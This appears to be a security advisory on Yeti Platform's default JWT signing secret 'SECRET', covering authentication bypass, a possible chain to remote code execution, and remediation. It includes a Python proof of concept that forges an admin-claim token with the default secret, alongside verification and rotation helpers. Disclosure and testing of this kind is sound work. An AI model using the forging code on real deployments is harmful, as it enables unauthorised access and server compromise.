Yeti Platform Use of Static Insecure Secret Vulnerability Allowing JWT Authentication Bypass

Vulnerability

A vulnerability exists in Yeti Platform versions prior to 2.1.12: the application's Docker deployment ships with a static JWT signing secret, the literal string 'SECRET'. If this value is not changed, anyone who knows it can sign valid JWT tokens and bypass authentication entirely. The root cause is that the .env file holding the secret is neither documented nor required to be modified during installation, so deployments running with the default value end up exposed in the wild.

Impact

Exploitation of this vulnerability allows an attacker to generate JWT tokens the server accepts, bypassing authentication without any credentials. Combined with a separate vulnerability in Yeti that lets authenticated users execute code on the server, this yields unauthenticated remote code execution.

Reproduction

To reproduce this vulnerability, deploy Yeti Platform with the default docker-compose file and leave the .env file unmodified. The deployed instance then signs and verifies JWTs with the static secret 'SECRET'. Because that secret is public knowledge, anyone can sign an arbitrary token that the server will accept as valid, bypassing authentication.
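The following is an added example, not code from the advisory or from the Yeti project. It shows the mechanics behind the reproduction step above with a minimal HS256 implementation from the standard library: a token signed with the default secret 'SECRET' verifies, while the same token is rejected once the secret is rotated to a random value. The claim names ("sub", "exp") are assumptions for illustration; the advisory does not specify which claims Yeti places in its tokens. The helper signed_with_default_secret is a check a defender can run on a token captured from a live deployment to decide whether that deployment is still running on the default value.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# The static value shipped in the default deployment, per the advisory.
DEFAULT_SECRET = "SECRET"

# Fixed far-future expiry (2100-01-01 UTC) so the example is deterministic.
FAR_FUTURE_EXP = 4102444800


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    """Inverse of b64url; restores the padding Python needs."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def forge_jwt(claims: dict, secret: str) -> str:
    """Sign an arbitrary claim set with HS256 under the given secret.

    This is exactly what an attacker can do once the secret is known.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_jwt(token: str, secret: str, now: int) -> Optional[dict]:
    """Verify an HS256 token; return its claims or None on any failure.

    Rejects malformed tokens, non-HS256 headers (so "alg": "none" cannot
    slip through), bad signatures, and expired tokens.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
        claims = json.loads(b64url_decode(p))
        provided_sig = b64url_decode(s)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, provided_sig):
        return None
    exp = claims.get("exp")
    if isinstance(exp, (int, float)) and exp < now:
        return None
    return claims


def signed_with_default_secret(token: str, now: int) -> bool:
    """Defender's check: does this token verify under the known default?

    A True result means the issuing deployment still uses 'SECRET'.
    """
    return verify_jwt(token, DEFAULT_SECRET, now) is not None


def rotate_secret() -> str:
    """Produce a replacement secret with 256 bits of entropy."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    now = 1_700_000_000  # constructed "current time" for the demo
    # Constructed claim set; the real claim names used by Yeti are not given
    # in the advisory, so these are assumptions.
    forged = forge_jwt({"sub": "admin", "exp": FAR_FUTURE_EXP}, DEFAULT_SECRET)
    print("accepted under default secret:", verify_jwt(forged, DEFAULT_SECRET, now) is not None)
    print("flagged as default-signed:", signed_with_default_secret(forged, now))
    new_secret = rotate_secret()
    print("accepted after rotation:", verify_jwt(forged, new_secret, now) is not None)
```

Running the script shows the forged token accepted under 'SECRET' and rejected after rotation; the same pattern (forge, then verify under the default) works as a quick offline test against any token captured from a deployment you are assessing.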

Remediation

Users are advised to update to Yeti Platform version 2.1.12 or later, where this vulnerability has been patched. Existing deployments should also replace the default value in the .env file with a randomly generated secret, since any instance still signing tokens with 'SECRET' remains open to forgery until the secret is changed.

Added: May 8, 2026, 6:21 AM
Updated: May 8, 2026, 6:21 AM

Vulnerability Rating

Custom Algorithm

spread          0.8
impact          5.0
exploitability  9.1
remediation     8.3
relevance       7.8
threat          6.4
urgency         2.9
incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.